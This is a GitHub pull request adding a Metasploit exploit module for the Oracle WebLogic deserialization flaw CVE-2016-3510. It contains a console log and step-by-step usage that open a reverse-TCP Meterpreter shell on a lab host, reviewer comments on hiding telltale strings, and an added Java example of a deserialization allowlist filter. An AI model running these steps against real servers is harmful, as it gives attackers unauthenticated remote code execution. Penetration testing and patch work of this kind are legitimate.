
Add Weblogic_serialize_marshalledobject CVE-2016-3510 #11134

Merged (8 commits), Apr 1, 2019

Conversation

acamro (Contributor) commented Dec 16, 2018

Hi everyone,
Please add this exploit module for CVE-2016-3510, Oracle Weblogic Deserialization Vulnerability.
It was tested on Windows 7 x64 with Oracle Weblogic Server v10.3.6.0 and v12.1.3.0.

TODO

Test on Linux
Test on Solaris
Improve the documentation

DEMO

 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
 rhost => 192.168.192.6
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit

 [*] Started reverse TCP handler on 192.168.192.136:4444 
 [*] 192.168.192.6:7001 - Sending handshake...
 [*] 192.168.192.6:7001 - Sending T3 request object...
 [*] 192.168.192.6:7001 - Sending client object payload...
 [*] Sending stage (179779 bytes) to 192.168.192.6
 [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Verification

  • Start msfconsole
  • use exploit/multi/misc/weblogic_deserialize_marshalledobject
  • set rhost
  • set rport
  • exploit
  • Enjoy!!!

asoto-r7 (Contributor) commented

@acamro : I apologize for the delay. It took me a while to work through everything here, but I've just pushed a commit to your branch with my reverse engineering of the JSOs in the module. In addition, the module now uses the ysoserial functionality added in #11125.

Remaining, I'd like to see if we can't figure out what the remaining blobs do (they're marked with #TODOs) and also see if we can randomize some of the telltale strings like computer names and IP addresses that seem to have no impact on the success of the exploit (also marked with #TODOs).

I'll have a similar commit on the #11131 PR in just a moment, then I'll be turning my attention to #11136, which gets more complex... 😬

Thanks for your patience! Feel free to tackle those #TODOs if you get a chance. Otherwise, I'll circle back tomorrow.

asoto-r7 (Contributor) commented Apr 1, 2019

Release Notes

The Oracle Weblogic Server Deserialization RCE module exploits a vulnerability in Oracle Weblogic Server v10.3.6.0 and v12.1.3.0. It provides an attacker with highly-reliable, unauthenticated remote code execution via a Java deserialization vulnerability.
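The release note above describes the bug class (untrusted Java deserialization) rather than the mechanics of the fix, so here is an added illustration that is not code from this PR, from the Metasploit module, or from Oracle. It places the vulnerable pattern (a bare `ObjectInputStream.readObject()` that will instantiate any serializable class on the classpath) beside the standard JDK mitigation, a JEP 290 serialization filter (`java.io.ObjectInputFilter`, Java 9 and later) that allowlists the one type the service expects and rejects everything else. The class names, the `Greeting` type, the filter pattern and the sample inputs are all constructed for this demo; the real remediation for WebLogic is Oracle's patch, and a filter like this is the general defence for any code that still has to deserialize Java objects.

```java
import java.io.*;

public class DeserializationFilterDemo {

    // The only serializable type this (hypothetical) service expects to receive.
    public static final class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        Greeting(String text) { this.text = text; }
        @Override public String toString() { return "Greeting(" + text + ")"; }
    }

    // Helper to build sample inputs in-process (constructed data, not a captured payload).
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Vulnerable pattern: readObject() with no filter. The stream, not the code,
    // decides which classes get instantiated, which is what gadget chains abuse.
    static Object readUnfiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    // Hardened form: an allowlist filter (JEP 290). Only Greeting and String are
    // accepted, with depth and size limits; the trailing "!*" rejects every other class.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
            "DeserializationFilterDemo$Greeting;java.lang.String;maxdepth=5;maxbytes=4096;!*");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(filter);
            return ois.readObject();   // throws InvalidClassException on a rejected class
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize(new Greeting("hello"));
        System.out.println("filtered read of expected type: " + readFiltered(expected));

        // Stand-in for a class the service never asked for. HashMap is harmless here,
        // but it is not on the allowlist, so the filter must refuse it before any of
        // its readObject logic runs.
        byte[] unexpected = serialize(new java.util.HashMap<String, String>());
        System.out.println("unfiltered read accepts anything: " + readUnfiltered(unexpected).getClass());
        try {
            readFiltered(unexpected);
            System.out.println("BUG: filter did not reject the unexpected class");
        } catch (InvalidClassException e) {
            System.out.println("filtered read rejected it: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac DeserializationFilterDemo.java && java DeserializationFilterDemo`. Rejection happens when the class descriptor is read, before the rejected class's own `readObject` executes, which is the property that matters: a gadget chain never gets to run. For a whole JVM rather than one stream, the same pattern syntax can be supplied process-wide through the `jdk.serialFilter` system property.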

tdoan-r7 added the rn-exploit and rn-modules (release notes for new or majorly enhanced modules) labels on Apr 15, 2019
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)